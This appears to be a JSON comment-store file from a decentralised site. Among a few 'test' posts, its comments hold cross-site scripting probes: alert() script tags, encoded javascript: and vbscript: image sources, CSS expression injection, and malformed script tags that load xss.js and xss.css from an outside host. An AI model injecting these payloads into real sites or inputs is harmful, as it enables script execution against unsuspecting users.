{
	"next_topic_id": 1,
	"topic": [],
	"topic_vote": {},
	"next_comment_id": 18,
	"comment": {
		"2_1J3rJ8ecnwH2EPYa6MrgZttBNc61ACFiCj": [
			{
				"comment_id": 1,
				"body": "<script>alert</script>",
				"added": 1536150650
			},
			{
				"comment_id": 2,
				"body": "test",
				"added": 1536150662
			},
			{
				"comment_id": 3,
				"body": "tst",
				"added": 1536150673
			},
			{
				"comment_id": 4,
				"body": "ceside",
				"added": 1536150684
			},
			{
				"comment_id": 12,
				"body": "<sCripT>alert(\"anyunix\")</Script>",
				"added": 1536151259
			},
			{
				"comment_id": 13,
				"body": "<IMG SRC=javascript:alert(\"anyunix\")>",
				"added": 1536151275
			},
			{
				"comment_id": 14,
				"body": "<img src=j&#97vascript:alert(\"anyunix\")>\n\n<img src=j&#97;vascript:alert('anyunix')>\n\n<img src=j&#x61vascript:alert('anyunix')>\n\n<img src=j&#x61;vascript:alert('anyunix')>",
				"added": 1536151292
			},
			{
				"comment_id": 15,
				"body": "> [harker](#comment_14_1PjG3bDsaJ9ZEdpZKh69YSAsELb2NfUawu): <img src=j&#97vascript:alert(\"anyunix\")> [...]",
				"added": 1536151301
			},
			{
				"comment_id": 16,
				"body": "<DIV STYLE=\"width:expression(alert('anyunix'));\">\n\n<IMG SRC='vbscript:msgbox(\"anyunix\")'>\n\n<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
				"added": 1536151325
			},
			{
				"comment_id": 17,
				"body": "<SCRIPTa=\">\"SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n\n<SCRIPT=\">\"SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n\n<SCRIPTa=\">'>\"SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n\nperl-e'print\"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\";'>out\n\n<IMG SRC=\"&#14; javascript:alert('XSS');\">",
				"added": 1536151344
			}
		],
		"1536127110_12gAes6NzDS9E2q6Q1UXrpUdbPS6nvuBPu": [
			{
				"comment_id": 5,
				"body": "test",
				"added": 1536150782
			},
			{
				"comment_id": 6,
				"body": "test",
				"added": 1536150794
			},
			{
				"comment_id": 7,
				"body": "test",
				"added": 1536150796
			},
			{
				"comment_id": 8,
				"body": "test> [robione](#comment_9_1DoVPxFrQCDb3grC8Nsn6aACed9o2oiumX): just tried again,You are already logged in with a KxoId. You cannot create another one!  [...]",
				"added": 1536150805
			},
			{
				"comment_id": 9,
				"body": "test> [robione](#comment_9_1DoVPxFrQCDb3grC8Nsn6aACed9o2oiumX): just tried again,You are already logged in with a KxoId. You cannot create another one!  [...]",
				"added": 1536150850
			},
			{
				"comment_id": 10,
				"body": "<script>alert</script>",
				"added": 1536150870
			},
			{
				"comment_id": 11,
				"body": "<script>alert(\"hello world\")</script>",
				"added": 1536150902
			}
		]
	},
	"comment_vote": {}
}